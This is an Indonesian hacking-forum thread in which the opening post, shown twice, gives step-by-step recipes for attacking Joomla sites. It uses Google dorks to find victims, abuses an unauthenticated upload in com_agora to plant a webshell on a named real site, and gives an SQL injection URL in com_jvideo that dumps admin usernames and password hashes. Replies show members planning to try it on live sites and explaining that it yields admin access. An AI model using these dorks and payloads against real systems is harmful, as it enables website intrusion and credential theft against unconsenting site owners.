Joomla Component Vuln
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Joomla Component Vuln
Courtesy Milw0rm.com
Just Share vuln On joomla CMS
I
1. Find viktim om google,
dgn dork
inurl:option=com_agora
2.setelah dapet viktimnya, loe masukan exploitnya :
index.php?option=com_agora&task=upload
misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload
3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini
components/com_agora/img/members/0/
misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]
II
type in google with dork :
inurl:option=com_jvideo or
inurl:com_jvideo
masukin exploitnya
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
semoga bermanfaat
Just Share vuln On joomla CMS
I
1. Find viktim om google,
dgn dork
inurl:option=com_agora
2.setelah dapet viktimnya, loe masukan exploitnya :
index.php?option=com_agora&task=upload
misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload
3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini
components/com_agora/img/members/0/
misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]
II
type in google with dork :
inurl:option=com_jvideo or
inurl:com_jvideo
masukin exploitnya
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
semoga bermanfaat
-
- Posts: 20
- Joined: Thu Jun 19, 2008 1:51 pm
Re: Joomla Component Vuln
to semua wweb yg pk joomla kan???
jajal ah.........
jajal ah.........
Re: Joomla Component Vuln
emm...
besok coba ah...
besok coba ah...
.::[tresno jalaran saking kulino]::.
.::[nek wes kullino]::.
.::[karepmu]::.
Re: Joomla Component Vuln
cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW
in learning you will teach, and in teaching you will learn......
Re: Joomla Component Vuln
iya itu buat web berbasis joomlaanja_indie wrote:to semua wweb yg pk joomla kan???
jajal ah.........
silahkan kkvodork wrote:emm...
besok coba ah...
taurnil wrote:cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW
iya mang tuh componentnya joomla kk
Re: Joomla Component Vuln
itu kelemahan yg ada di web berbasis joomlaandi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
klo kita dapat mengetahui user N pass adminnya
Re: Joomla Component Vuln
termasuk masuk ke joomla administration itu webnya yah?N4ck0 wrote:itu kelemahan yg ada di web berbasis joomlaandi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
klo kita dapat mengetahui user N pass adminnya
--------be careful boy's!------
Re: Joomla Component Vuln
andi90 wrote:termasuk masuk ke joomla administration itu webnya yah?N4ck0 wrote:itu kelemahan yg ada di web berbasis joomlaandi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
klo kita dapat mengetahui user N pass adminnya
iya kk
mang itu buat jadi adminnya
ada juga yang langsung upload shell kita